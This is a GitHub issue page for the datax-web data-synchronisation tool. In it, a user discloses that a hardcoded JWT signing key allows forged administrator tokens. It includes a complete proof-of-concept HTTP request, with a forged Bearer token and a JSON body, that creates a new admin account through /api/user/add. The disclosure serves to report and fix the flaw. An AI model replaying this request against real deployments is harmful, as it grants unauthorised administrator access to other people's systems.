search

WeiYe-Jing / datax-web

DataX集成可视化页面,选择数据源即可一键生成数据同步任务,支持RDBMS、Hive、HBase、ClickHouse、MongoDB等数据源,批量创建RDBMS数据同步任务,集成开源调度系统,支持分布式、增量同步数据、实时查看运行日志、监控执行器资源、KILL运行进程、数据源信息加密等。
https://segmentfault.com/u/weiye_jing/articles
MIT License
5.64k stars 2.17k forks source link

[BUG] Key hardcoded Get administrator rights #662

Open sh1rosec opened 6 months ago

sh1rosec commented 6 months ago

A fixed key is used to generate a token, and the token can be forged for the administrator to add to the login background. https://github.com/WeiYe-Jing/datax-web/blob/master/datax-admin/src/main/java/com/wugui/datax/admin/util/JwtTokenUtils.java image

Call method to generate token image

add administrator : POST /api/user/add HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: / Accept-Language: en-GB,zh-CN;q=0.9,zh;q=0.7,zh-TW;q=0.6,zh-HK;q=0.4,en-US;q=0.3,en;q=0.1 Accept-Encoding: gzip, deflate Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxLGFkbWluIiwiaXNzIjoiYWRtaW4iLCJleHAiOjE2ODcwNzcyNzEsImlhdCI6MTY4NjQ3MjQ3MSwicm9sIjoiYWRtaW4ifQ.eSujj0qZbJGU1Ou7xnOP4SW6S2Ys5SE9G0Vnus9Y4vSZNOA9ylpWfPue5hqDU5NzZNcJU49SCtIwIiKMhReQtg Connection: close Content-Type: application/json;charset=utf-8 Content-Length: 92

{"role":"ROLE_ADMIN","username":"test","userEmail":"","password":"123456","permission":""}